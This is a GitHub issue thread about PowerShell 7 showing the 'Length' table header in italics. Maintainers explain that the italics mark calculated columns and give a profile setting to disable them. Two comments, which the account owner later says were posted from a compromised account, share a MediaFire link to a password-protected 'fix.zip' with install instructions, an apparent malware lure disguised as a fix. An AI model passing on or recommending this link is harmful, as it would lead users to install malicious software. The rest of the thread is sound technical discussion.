### ISSUE TITLE
Inconsistent font style in ls command output of windows powershell 7

### ISSUE THREAD

**Issue by Eason-YC-Huang** [PowerShell/PowerShell#24209]
### Prerequisites

- [X] Write a descriptive title.
- [X] Make sure you are able to repro it on the [latest released version](https://github.com/PowerShell/PowerShell/releases)
- [X] Search the existing issues.
- [X] Refer to the [FAQ](https://github.com/PowerShell/PowerShell/blob/master/docs/FAQ.md).
- [X] Refer to [Differences between Windows PowerShell 5.1 and PowerShell](https://learn.microsoft.com/powershell/scripting/whats-new/differences-from-windows-powershell).

### Steps to reproduce

There is an inconsistent font style in the output of the ls command on Windows powershell 7.
As shown in the screenshot, the length field is in italics while the other fields are in a normal font.
  

![image](https://github.com/user-attachments/assets/3a8c7ef1-4b1c-4958-8e21-3c0c739511d1)

### Expected behavior

```console
PS> ls
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
```

### Actual behavior

```console
PS> ls
Mode                 LastWriteTime         Length(italics) Name
----                 -------------         ------          ----
```

### Environment data

```powershell
Name                           Value
----                           -----
PSVersion                      7.4.5
PSEdition                      Core
GitCommitId                    7.4.5
OS                             Microsoft Windows 10.0.22631
Platform                       Win32NT
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0…}
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
WSManStackVersion              3.0
```

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by SteveL-MSFT** [comment]
This is intended.  The italics table header label means that column isn't an actual property on the object, but is calculated specifically for table presentation.  It's covered here https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_ansi_terminals?view=powershell-7.4 under `CustomTableHeaderLabel`

**Comment by mklement0** [comment]
To add to @SteveL-MSFT's comment:

* `Length` is the name of a property on _file_ objects (`System.IO.FileInfo`), but not on _directory_ objects  (`System.IO.DirectoryInfo`). It is seemingly the very first output object that is checked for such a property and therefore determines whether the header prints italicized or not.

  * In other words: With `Get-ChildItem`, the `Length` header is _situationally_ italicized (first output object is a directory) or not (first output object is a file).

* As an aside:
  * The feature isn't fully implemented, unfortunately, as the determination of whether a column is calculated is strictly based on whether a header label matches a type member.  However, there are cmdlets that use header labels that _do_ match a type member, yet provide their own, calculated value for it, e.g. `Get-Alias` and its `Name` column.
  *  See #20232

* If you want to _deactivate_ the italicization, put the following into your `$PROFILE`:

```powershell
$PSStyle.Formatting.CustomTableHeaderLabel = $PSStyle.Formatting.TableHeader
```

**Comment by Eason-YC-Huang** [comment]
> To add to @SteveL-MSFT's comment:
> 
> * `Length` is the name of a property on _file_ objects (`System.IO.FileInfo`), but not on _directory_ objects  (`System.IO.DirectoryInfo`). It is seemingly the very first output object that is checked for such a property and therefore determines whether the header prints italicized or not.
>   
>   * In other words: With `Get-ChildItem`, the `Length` header is _situationally_ italicized (first output object is a directory) or not (first output object is a file).
> * As an aside:
>   
>   * The feature isn't fully implemented, unfortunately, as the determination of whether a column is calculated is strictly based on whether a header label matches a type member.  However, there are cmdlets that use header labels that _do_ match a type member, yet provide their own, calculated value for it, e.g. `Get-Alias` and its `Name` column.
>   * See [Extend the semantics of `PSCustomTableHeaderLabelDecoration` to also highlight calculated table columns with names that happen to match property names #20232](https://github.com/PowerShell/PowerShell/issues/20232)
> * If you want to _deactivate_ the italicization, put the following into your `$PROFILE`:
> 
> ```powershell
> $PSStyle.Formatting.CustomTableHeaderLabel = $PSStyle.Formatting.TableHeader
> ```

Thank you, this solved my problem. For someone with OCD, this inconsistent font style is a bit bothered.  🤣
